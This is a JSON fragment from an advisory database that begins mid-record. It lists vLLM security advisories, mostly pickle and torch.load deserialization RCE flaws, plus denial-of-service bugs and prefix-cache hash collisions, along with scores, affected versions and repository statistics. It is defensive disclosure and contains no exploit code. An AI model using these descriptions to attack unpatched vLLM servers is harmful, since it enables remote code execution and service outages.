","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.4","vulnerable_version_range":"\u003e= 0.6.5, \u003c 0.8.4"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oZjNjLXd4ZzItNDlxOc4ABGyu/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jajQ3LXFqNmcteDdyNM4ABFt3","url":"https://github.com/advisories/GHSA-cj47-qj6g-x7r4","title":"vLLM allows Remote Code Execution by Pickle Deserialization via AsyncEngineRPCServer() RPC server entrypoints","description":"vllm-project vllm version 0.6.0 contains a vulnerability in the AsyncEngineRPCServer() RPC server entrypoints. The core functionality run_server_loop() calls the function _make_handler_coro(), which directly uses cloudpickle.loads() on received messages without any sanitization. This can result in remote code execution by deserializing malicious pickle data.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-03-20T12:32:50.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-9053","https://huntr.com/bounties/75a544f3-34a3-4da0-b5a3-1495cb031e09","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-222.yaml","https://github.com/advisories/GHSA-cj47-qj6g-x7r4"],"source_kind":"github","identifiers":["GHSA-cj47-qj6g-x7r4","CVE-2024-9053"],"repository_url":null,"blast_radius":0.0,"created_at":"2025-03-21T04:08:09.434Z","updated_at":"2026-09-23T15:09:34.713Z","epss_percentage":0.0138,"epss_percentile":0.709,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jajQ3LXFqNmcteDdyNM4ABFt3","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jajQ3LXFqNmcteDdyNM4ABFt3","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.6.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jajQ3LXFqNmcteDdyNM4ABFt3/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wZ3I3LW1ocDUtZmdqcM4ABFtr","url":"https://github.com/advisories/GHSA-pgr7-mhp5-fgjp","title":"vLLM deserialization vulnerability in vllm.distributed.GroupCoordinator.recv_object","description":"vllm-project vllm version 0.6.0 contains a vulnerability in the distributed training API. The function vllm.distributed.GroupCoordinator.recv_object() deserializes received object bytes using pickle.loads() without sanitization, leading to a remote code execution vulnerability.\n\n### Maintainer perspective\nNote that vLLM does NOT use the code as described in the report on huntr. The problem only exists if you use these internal APIs in a way that exposes them to a network as described. The vllm team was not involved in the analysis of this report and the decision to assign it a CVE.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-03-20T12:32:50.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-9052","https://huntr.com/bounties/ea75728f-4efe-4a3d-9f53-33f2c908e9f8","https://github.com/vllm-project/vllm/blob/32e7db25365415841ebc7c4215851743fbb1bad1/vllm/distributed/parallel_state.py#L480","https://github.com/vllm-project/vllm/blob/v0.8.1/vllm/distributed/parallel_state.py#L457","https://github.com/github/advisory-database/pull/5444","https://github.com/advisories/GHSA-pgr7-mhp5-fgjp"],"source_kind":"github","identifiers":["GHSA-pgr7-mhp5-fgjp","CVE-2024-9052"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-03-21T04:08:09.719Z","updated_at":"2026-09-23T15:09:34.714Z","epss_percentage":0.00327,"epss_percentile":0.52603,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wZ3I3LW1ocDUtZmdqcM4ABFtr","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wZ3I3LW1ocDUtZmdqcM4ABFtr","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.8.1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wZ3I3LW1ocDUtZmdqcM4ABFtr/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01dnFyLXdwcmMtY3BwN84ABFsD","url":"https://github.com/advisories/GHSA-5vqr-wprc-cpp7","title":"vLLM Deserialization of Untrusted Data vulnerability","description":"vllm-project vllm version v0.6.2 contains a vulnerability in the MessageQueue.dequeue() API function. The function uses pickle.loads to parse received sockets directly, leading to a remote code execution vulnerability. An attacker can exploit this by sending a malicious payload to the MessageQueue, causing the victim's machine to execute arbitrary code.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-03-20T12:32:41.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.8,"cvss_vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-11041","https://huntr.com/bounties/00136195-11e0-4ad0-98d5-72db066e867f","https://github.com/vllm-project/vllm/blob/7193774b1ff8603ad5bf4598e5efba0d9a39b436/vllm/distributed/device_communicators/shm_broadcast.py#L441-L443","https://github.com/advisories/GHSA-5vqr-wprc-cpp7"],"source_kind":"github","identifiers":["GHSA-5vqr-wprc-cpp7","CVE-2024-11041"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-03-21T17:08:11.038Z","updated_at":"2026-09-23T15:09:34.704Z","epss_percentage":0.01555,"epss_percentile":0.74043,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01dnFyLXdwcmMtY3BwN84ABFsD","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01dnFyLXdwcmMtY3BwN84ABFsD","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.6.2"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01dnFyLXdwcmMtY3BwN84ABFsD/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14M204LWY3ZzUtcWhtN84ABFpg","url":"https://github.com/advisories/GHSA-x3m8-f7g5-qhm7","title":"vLLM Allows Remote Code Execution via Mooncake Integration","description":"### Summary\nWhen vLLM is configured to use Mooncake, unsafe deserialization exposed directly over ZMQ/TCP will allow attackers to execute remote code on distributed hosts.\n\n### Details\n1. Pickle deserialization vulnerabilities are [well documented](https://docs.python.org/3/library/pickle.html).\n2. The [mooncake pipe](https://github.com/vllm-project/vllm/blob/9bebc9512f9340e94579b9bd69cfdc452c4d5bb0/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L206) is exposed over the network (by design to enable disaggregated prefilling across distributed environments) using ZMQ over TCP, greatly increasing exploitability. ~~Further, the mooncake integration opens these sockets listening on all interfaces on the host, meaning it can not be configured to only use a private, trusted network.~~\n\nOnly `sender_socket` and `receiver_ack` are allowed to be accessed publicly, while the data actually decompressed by `pickle.loads()` comes from [recv_bytes](https://github.com/vllm-project/vllm/blob/9bebc9512f9340e94579b9bd69cfdc452c4d5bb0/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L257). Its interface is defined as `self.receiver_socket.connect(f\\\"tcp://{d_host}:{d_rank_offset + 1}\\\")`, where `d_host` is `decode_host`, a locally defined address 192.168.0.139,from mooncake.json (https://github.com/kvcache-ai/Mooncake/blob/main/doc/en/vllm-integration-v0.2.md?plain=1#L36).\n\n3. The root problem is [`recv_tensor()`](https://github.com/vllm-project/vllm/blob/9bebc9512f9340e94579b9bd69cfdc452c4d5bb0/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L257) calls [`_recv_impl`](https://github.com/vllm-project/vllm/blob/9bebc9512f9340e94579b9bd69cfdc452c4d5bb0/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L244) which passes the raw network bytes to `pickle.loads()`. Additionally, it does not appear that there are any controls (network, authentication, etc) to prevent arbitrary users from sending this payload to the affected service.\n\n\n\n### Impact\nThis is a remote code execution vulnerability impacting any deployments using Mooncake to distribute KV across distributed hosts.\n\n### Remediation\nThis issue is resolved by https://github.com/vllm-project/vllm/pull/14228","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-03-19T15:55:58.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.0,"cvss_vector":"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7","https://github.com/vllm-project/vllm/pull/14228","https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2","https://nvd.nist.gov/vuln/detail/CVE-2025-29783","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-63.yaml","https://github.com/advisories/GHSA-x3m8-f7g5-qhm7"],"source_kind":"github","identifiers":["GHSA-x3m8-f7g5-qhm7","CVE-2025-29783"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-03-19T16:08:10.612Z","updated_at":"2026-10-03T14:06:50.012Z","epss_percentage":0.00728,"epss_percentile":0.52544,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M204LWY3ZzUtcWhtN84ABFpg","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14M204LWY3ZzUtcWhtN84ABFpg","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.0","vulnerable_version_range":"\u003e= 0.6.5, \u003c 0.8.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14M204LWY3ZzUtcWhtN84ABFpg/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tZ3JtLWZnanYtbWh2OM4ABFpf","url":"https://github.com/advisories/GHSA-mgrm-fgjv-mhv8","title":"vLLM denial of service via outlines unbounded cache on disk","description":"### Impact\nThe [outlines](https://dottxt-ai.github.io/outlines/latest/) library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server.\n\nThe affected code in vLLM is [vllm/model_executor/guided_decoding/outlines_logits_processors.py](https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py), which unconditionally uses the cache from outlines. vLLM should have this off by default and allow administrators to opt-in due to the potential for abuse.\n\nA malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space.\n\nNote that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the `guided_decoding_backend` key of the `extra_body` field of the request.\n\nThis issue applies to the V0 engine only. The V1 engine is not affected.\n\n### Patches\n\n* https://github.com/vllm-project/vllm/pull/14837\n\nThe fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the `VLLM_V0_USE_OUTLINES_CACHE` environment variable to `1`.\n\n### Workarounds\n\nThere is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.\n\n### References","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-03-19T15:52:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-mgrm-fgjv-mhv8","https://github.com/vllm-project/vllm/pull/14837","https://github.com/vllm-project/vllm/blob/53be4a863486d02bd96a59c674bbec23eec508f6/vllm/model_executor/guided_decoding/outlines_logits_processors.py","https://nvd.nist.gov/vuln/detail/CVE-2025-29770","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-223.yaml","https://github.com/advisories/GHSA-mgrm-fgjv-mhv8"],"source_kind":"github","identifiers":["GHSA-mgrm-fgjv-mhv8","CVE-2025-29770"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-03-19T16:08:10.960Z","updated_at":"2026-09-30T09:08:05.986Z","epss_percentage":0.00461,"epss_percentile":0.37517,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tZ3JtLWZnanYtbWh2OM4ABFpf","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1tZ3JtLWZnanYtbWh2OM4ABFpf","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.8.0","vulnerable_version_range":"\u003c 0.8.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tZ3JtLWZnanYtbWh2OM4ABFpf/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ybTc2LTRtcmYtdjlyOM4ABEMS","url":"https://github.com/advisories/GHSA-rm76-4mrf-v9r8","title":"vLLM uses Python 3.12 built-in hash() which leads to predictable hash collisions in prefix cache","description":"### Summary\n\nMaliciously constructed prompts can lead to hash collisions, resulting in prefix cache reuse, which can interfere with subsequent responses and cause unintended behavior.\n\n### Details\n\nvLLM's prefix caching makes use of Python's built-in hash() function. As of Python 3.12, the behavior of hash(None) has changed to be a predictable constant value. This makes it more feasible that someone could try exploit hash collisions.\n\n### Impact\n\nThe impact of a collision would be using cache that was generated using different content. Given knowledge of prompts in use and predictable hashing behavior, someone could intentionally populate the cache using a prompt known to collide with another prompt in use. \n\n### Solution\n\nWe address this problem by initializing hashes in vllm with a value that is no longer constant and predictable. It will be different each time vllm runs. This restores behavior we got in Python versions prior to 3.12.\n\nUsing a hashing algorithm that is less prone to collision (like sha256, for example) would be the best way to avoid the possibility of a collision. However, it would have an impact to both performance and memory footprint. Hash collisions may still occur, though they are no longer straight forward to predict.\n\nTo give an idea of the likelihood of a collision, for randomly generated hash values (assuming the hash generation built into Python is uniformly distributed), with a cache capacity of 50,000 messages and an average prompt length of 300, a collision will occur on average once every 1 trillion requests.\n\n### References\n\n* https://github.com/vllm-project/vllm/pull/12621\n* https://github.com/python/cpython/commit/432117cd1f59c76d97da2eaff55a7d758301dbc7\n* https://github.com/python/cpython/pull/99541","origin":"UNSPECIFIED","severity":"LOW","published_at":"2025-02-06T20:00:05.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":2.6,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-rm76-4mrf-v9r8","https://github.com/python/cpython/pull/99541","https://github.com/vllm-project/vllm/pull/12621","https://github.com/python/cpython/commit/432117cd1f59c76d97da2eaff55a7d758301dbc7","https://github.com/vllm-project/vllm/commit/73b35cca7f3745d07d439c197768b25d88b6ab7f","https://nvd.nist.gov/vuln/detail/CVE-2025-25183","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-62.yaml","https://github.com/advisories/GHSA-rm76-4mrf-v9r8"],"source_kind":"github","identifiers":["GHSA-rm76-4mrf-v9r8","CVE-2025-25183"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-02-06T20:07:29.940Z","updated_at":"2026-09-25T12:08:47.747Z","epss_percentage":0.00191,"epss_percentile":0.07698,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybTc2LTRtcmYtdjlyOM4ABEMS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ybTc2LTRtcmYtdjlyOM4ABEMS","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.7.2","vulnerable_version_range":"\u003c 0.7.2"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybTc2LTRtcmYtdjlyOM4ABEMS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yaDRqLTVyaHctaHI1NM4ABD24","url":"https://github.com/advisories/GHSA-rh4j-5rhw-hr54","title":"vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator","description":"### Description\nThe vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weights_only parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling.\n\n### Impact\nThis vulnerability can be exploited to execute arbitrary codes and OS commands in the victim machine who fetch the pretrained repo remotely.\n\nNote that most models now use the safetensors format, which is not vulnerable to this issue.\n\n### References\n* https://pytorch.org/docs/stable/generated/torch.load.html\n* Fix: https://github.com/vllm-project/vllm/pull/12366","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2025-01-27T20:50:30.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54","https://nvd.nist.gov/vuln/detail/CVE-2025-24357","https://github.com/vllm-project/vllm/pull/12366","https://github.com/vllm-project/vllm/commit/d3d6bb13fb62da3234addf6574922a4ec0513d04","https://github.com/vllm-project/vllm/releases/tag/v0.7.0","https://pytorch.org/docs/stable/generated/torch.load.html","https://github.com/pypa/advisory-database/tree/main/vulns/vllm/PYSEC-2025-58.yaml","https://github.com/advisories/GHSA-rh4j-5rhw-hr54"],"source_kind":"github","identifiers":["GHSA-rh4j-5rhw-hr54","CVE-2025-24357"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":0.0,"created_at":"2025-01-27T21:08:58.393Z","updated_at":"2026-09-25T12:08:51.104Z","epss_percentage":0.00697,"epss_percentile":0.50939,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yaDRqLTVyaHctaHI1NM4ABD24","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yaDRqLTVyaHctaHI1NM4ABD24","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.7.0","vulnerable_version_range":"\u003c 0.7.0"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yaDRqLTVyaHctaHI1NM4ABD24/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13YzM2LTk2OTQtZjlyZs4AA_mw","url":"https://github.com/advisories/GHSA-wc36-9694-f9rf","title":"vLLM Denial of Service via the best_of parameter","description":"A vulnerability was found in the ilab model serve component, where improper handling of the best_of parameter in the vllm JSON web API can lead to a Denial of Service (DoS). The API used for LLM-based sentence or chat completion accepts a best_of parameter to return the best completion from several options. When this parameter is set to a large value, the API does not handle timeouts or resource exhaustion properly, allowing an attacker to cause a DoS by consuming excessive system resources. This leads to the API becoming unresponsive, preventing legitimate users from accessing the service.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-09-17T18:33:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.9,"cvss_vector":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-8939","https://access.redhat.com/security/cve/CVE-2024-8939","https://bugzilla.redhat.com/show_bug.cgi?id=2312782","https://github.com/vllm-project/vllm/issues/6137","https://github.com/advisories/GHSA-wc36-9694-f9rf"],"source_kind":"github","identifiers":["GHSA-wc36-9694-f9rf","CVE-2024-8939"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":4.82289302991853,"created_at":"2024-09-17T22:05:58.771Z","updated_at":"2026-09-25T12:09:38.317Z","epss_percentage":0.00233,"epss_percentile":0.12616,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13YzM2LTk2OTQtZjlyZs4AA_mw","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13YzM2LTk2OTQtZjlyZs4AA_mw","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 0.5.0.post1"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13YzM2LTk2OTQtZjlyZs4AA_mw/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13MnI3LTk1NzktMjdoZs4AA_m0","url":"https://github.com/advisories/GHSA-w2r7-9579-27hf","title":"vLLM denial of service vulnerability","description":"A flaw was found in the vLLM library. A completions API request with an empty prompt will crash the vLLM API server, resulting in a denial of service.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-09-17T18:33:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.7,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-8768","https://github.com/vllm-project/vllm/issues/7632","https://github.com/vllm-project/vllm/pull/7746","https://access.redhat.com/security/cve/CVE-2024-8768","https://bugzilla.redhat.com/show_bug.cgi?id=2311895","https://github.com/vllm-project/vllm/commit/e25fee57c2e69161bd261f5986dc5aeb198bbd42","https://github.com/advisories/GHSA-w2r7-9579-27hf"],"source_kind":"github","identifiers":["GHSA-w2r7-9579-27hf","CVE-2024-8768"],"repository_url":"https://github.com/vllm-project/vllm","blast_radius":6.081039037723364,"created_at":"2024-09-17T22:05:59.148Z","updated_at":"2026-09-28T20:09:01.412Z","epss_percentage":0.00682,"epss_percentile":0.50508,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13MnI3LTk1NzktMjdoZs4AA_m0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13MnI3LTk1NzktMjdoZs4AA_m0","packages":[{"ecosystem":"pypi","package_name":"vllm","versions":[{"first_patched_version":"0.5.5","vulnerable_version_range":"\u003c 0.5.5"}],"purl":"pkg:pypi/vllm"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13MnI3LTk1NzktMjdoZs4AA_m0/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/vllm","docker_dependents_count":27,"docker_downloads_count":16137,"usage_url":"https://repos.ecosyste.ms/usage/pypi/vllm","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/vllm/dependencies","status":null,"funding_links":["https://github.com/sponsors/vllm-project","https://opencollective.com/vllm"],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-30T15:01:30.307Z","issues_count":9462,"pull_requests_count":17696,"avg_time_to_close_issue":6749981.802,"avg_time_to_close_pull_request":1075065.851775281,"issues_closed_count":5500,"pull_requests_closed_count":11124,"pull_request_authors_count":2776,"issue_authors_count":5455,"avg_comments_per_issue":2.6727964489537097,"avg_comments_per_pull_request":3.138279837251356,"merged_pull_requests_count":8685,"bot_issues_count":1,"bot_pull_requests_count":44,"past_year_issues_count":261,"past_year_pull_requests_count":1171,"past_year_avg_time_to_close_issue":8254026.266666667,"past_year_avg_time_to_close_pull_request":1040504.7876447877,"past_year_issues_closed_count":45,"past_year_pull_requests_closed_count":259,"past_year_pull_request_authors_count":685,"past_year_issue_authors_count":227,"past_year_avg_comments_per_issue":3.57088122605364,"past_year_avg_comments_per_pull_request":4.208368915456875,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":4,"past_year_merged_pull_requests_count":172,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/vllm-project%2Fvllm/issues","maintainers":[{"login":"DarkLight1337","count":772,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DarkLight1337"},{"login":"youkaichao","count":762,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/youkaichao"},{"login":"WoosukKwon","count":626,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/WoosukKwon"},{"login":"mgoin","count":598,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mgoin"},{"login":"hmellor","count":351,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hmellor"},{"login":"simon-mo","count":313,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/simon-mo"},{"login":"Isotr0py","count":296,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Isotr0py"},{"login":"njhill","count":291,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/njhill"},{"login":"ywang96","count":270,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ywang96"},{"login":"russellb","count":241,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/russellb"},{"login":"jeejeelee","count":208,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeejeelee"},{"login":"robertgshaw2-neuralmagic","count":200,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/robertgshaw2-neuralmagic"},{"login":"khluu","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/khluu"},{"login":"robertgshaw2-redhat","count":151,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/robertgshaw2-redhat"},{"login":"tlrmchlsmth","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tlrmchlsmth"},{"login":"heheda12345","count":143,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/heheda12345"},{"login":"LucasWilkinson","count":129,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/LucasWilkinson"},{"login":"rkooo567","count":108,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rkooo567"},{"login":"comaniac","count":102,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/comaniac"},{"login":"tdoublep","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tdoublep"},{"login":"aarnphm","count":80,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aarnphm"},{"login":"ruisearch42","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ruisearch42"},{"login":"zhuohan123","count":75,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhuohan123"},{"login":"KuntaiDu","count":67,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KuntaiDu"},{"login":"yewentao256","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yewentao256"},{"login":"Yard1","count":62,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yard1"},{"login":"cadedaniel","count":61,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cadedaniel"},{"login":"LiuXiaoxuanPKU","count":61,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/LiuXiaoxuanPKU"},{"login":"zou3519","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zou3519"},{"login":"yaochengji","count":47,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yaochengji"},{"login":"22quinn","count":45,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/22quinn"},{"login":"sarckk","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sarckk"},{"login":"markmc","count":42,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/markmc"},{"login":"luccafong","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/luccafong"},{"login":"houseroad","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"pcmoritz","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pcmoritz"},{"login":"vanbasten23","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vanbasten23"},{"login":"esmeetu","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/esmeetu"},{"login":"ProExpertProg","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ProExpertProg"},{"login":"alexm-redhat","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexm-redhat"},{"login":"gshtras","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gshtras"},{"login":"hongxiayang","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hongxiayang"},{"login":"AndreasKaratzas","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/AndreasKaratzas"},{"login":"lk-chen","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lk-chen"},{"login":"lsy323","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lsy323"},{"login":"yeqcharlot